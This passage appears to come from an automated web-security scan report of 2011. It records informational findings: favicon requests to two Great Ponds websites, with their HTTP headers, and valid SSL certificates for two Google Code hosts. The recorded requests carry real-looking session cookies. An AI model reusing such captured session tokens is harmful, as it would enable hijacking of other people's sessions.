!!!!*=(5yj!#c@(!!!!%=+e?/!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!$=+e?/!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=+e?/!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!#=+%.t!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!%=+40Q!#w!v!!!!#=+(:i!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!0=+rZu!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!6n!!!!$=+e?/!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!VA!!!!#=+40Q!$!VB!!!!#=+40Q!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=+e?/!$#X4!!!!#=#%VO!$#yu!!!!.=+e?/!$$I]!!!!%=+e?/!$$Ig!!!!%=+e?/!$$Il!!!!%=+e?/!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!)=+e?/!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$35v!!!!#=(BU="; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:48:50 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 23 Jul 2011 13:48:50 GMT
Pragma: no-cache
Content-Length: 4583
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...

30.2. http://greatponds.squarespace.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://greatponds.squarespace.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: greatponds.squarespace.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=9F024BFCD9D54EAEEB165C54DB57F8E4.web125; ss_lastvisit=1311426661245; WebPersCookie=toq34UxfYnRKkR288w7usH+6wdXqHs9RkEUHAxFtlhFm8gum1EhPPfZKDCvjA+jlkI0fm1YYVXNCBNc=

Response

HTTP/1.1 200 OK
X-ServedBy: web125
Pragma: cache
Cache-Control: private,max-age=604800
Accept-Ranges: bytes
ETag: W/"1150-1311285752000"
Last-Modified: Thu, 21 Jul 2011 22:02:32 GMT
Content-Length: 1150
Date: Sat, 23 Jul 2011 13:11:15 GMT
Server: SSWS

............ .h.......(....... ..... .....@...................................,,, ,,,I,,,.,,,.,,,.,,,.,,,I,,, ....................,,,%,,,n,,,.///.FFF.eee.....eee.QQQ.===.....,,,.,,,n,,,%....,,,.444.LL
...[SNIP]...

30.3. http://media.trafficmp.com/a/js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.trafficmp.com
Path:	/a/js

Request

Response

30.4. http://www.greatpondsma.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.greatpondsma.org
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.greatpondsma.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=87536A4DDFC5C4B2E965B498758387AE.web125; ss_lastvisit=1311426616535; WebPersCookie=B2Hc4SKbaflWHou88w7usH+6wdXqHu2psE19EUGTmeBJisCZPUm/gk734KQiYR5etFU8jSleSlDi4k0=

Response

HTTP/1.1 200 OK
X-ServedBy: web125
Pragma: cache
Cache-Control: private,max-age=604800
Accept-Ranges: bytes
ETag: W/"1150-1311285752000"
Last-Modified: Thu, 21 Jul 2011 22:02:32 GMT
Content-Length: 1150
Date: Sat, 23 Jul 2011 13:10:34 GMT
Server: SSWS

............ .h.......(....... ..... .....@...................................,,, ,,,I,,,.,,,.,,,.,,,.,,,I,,, ....................,,,%,,,n,,,.///.FFF.eee.....eee.QQQ.===.....,,,.,,,n,,,%....,,,.444.LL
...[SNIP]...

31. SSL certificate previous
There are 2 instances of this issue:

https://code.google.com/
https://domsnitch.googlecode.com/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

31.1. https://code.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://code.google.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.google.com
Issued by:	Google Internet Authority
Valid from:	Mon Jun 06 23:40:43 CDT 2011
Valid to:	Wed Jun 06 23:50:43 CDT 2012

Certificate chain #1

Issued to:	Google Internet Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Mon Jun 08 15:43:27 CDT 2009
Valid to:	Fri Jun 07 14:43:27 CDT 2013

Certificate chain #2

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 11:41:51 CDT 1998
Valid to:	Wed Aug 22 11:41:51 CDT 2018

31.2. https://domsnitch.googlecode.com/ previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://domsnitch.googlecode.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.googlecode.com
Issued by:	Google Internet Authority
Valid from:	Mon Jun 06 23:43:33 CDT 2011
Valid to:	Wed Jun 06 23:53:33 CDT 2012

Certificate chain #1

Issued to:	Google Internet Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Mon Jun 08 15:43:27 CDT 2009
Valid to:	Fri Jun 07 14:43:27 CDT 2013

Certificate chain #2

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 11:41:51 CDT 1998
Valid to:	Wed Aug 22 11:41:51 CDT 2018

Report generated by XSS.CX at Sat Jul 23 10:10:40 CDT 2011.